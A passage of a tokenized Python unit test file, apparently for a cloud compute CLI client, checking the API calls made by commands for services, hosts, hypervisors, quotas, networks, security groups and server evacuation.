<NUM_LIT:1> ) <EOL> def test_reset_network ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_services_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_binary ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_host_binary ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_enable ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_disable ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_disable_with_reason ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_fixed_ips_get ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_fixed_ips_reserve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_fixed_ips_unreserve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_host_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_list_with_zone ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_update_status ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:status>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_update_maintenance ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_update_multiple_settings ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_startup ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_shutdown ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_reboot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_evacuate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_with_shared_storage ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_with_no_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:4> ) <EOL> def test_host_servers_migrate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:4> ) <EOL> def test_hypervisor_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_list_matching ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_show_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_list_show_by_cell_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_show_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_cell_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_stats ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_show ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_user_quota_show ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_show_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_defaults ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_defaults_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_update ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_user_quota_update ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_force_update ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_update_fixed_ip ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_user_quota_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_class_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_class_update ( self ) : <EOL> args = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> for arg in args : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % arg ) <EOL> request_param = arg [ <NUM_LIT:2> : ] . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> body = { '<STR_LIT>' : { request_param : <NUM_LIT:5> } } <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> body ) <EOL> def test_network_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_network_list_fields ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_network_list_invalid_fields ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_network_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cloudpipe_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cloudpipe_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_cloudpipe_configure ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_network_associate_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_associate_project ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:id>' : "<STR_LIT:1>" } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_disassociate_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_disassociate_project ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_v4 ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_v6 ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_invalid ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_network_create_multi_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_vlan ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:200> } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_vlan_start ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_extra_args ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_tenant_network_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_tenant_network_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_tenant_network_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_tenant_network_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_add_fixed_ip ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> def test_remove_fixed_ip ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_backup ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> def test_absolute_limits ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_limits ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> stdout , _ = self . run_command ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , stdout ) <EOL> self . assertIn ( '<STR_LIT:Name>' , stdout ) <EOL> def test_evacuate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> def test_evacuate_with_no_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } ) <EOL> def test_get_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_get_password_without_key ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_clear_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_availability_zone_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_security_group_update ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_security_group_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_add_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } } ) <EOL> def test_security_group_delete_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_rule_protocol_case ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_add_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:2> } } ) <EOL> def test_security_group_delete_valid_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_valid_group_rule_protocol_case ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_invalid_group_rule ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_delete_invalid_group_rule_protocol_case ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_security_group_list_rules ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_list_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_security_group_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_server_security_group_add ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_server_security_group_remove ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_server_security_group_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_interface_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_interface_attach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_interface_detach ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_volume_attachments ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , 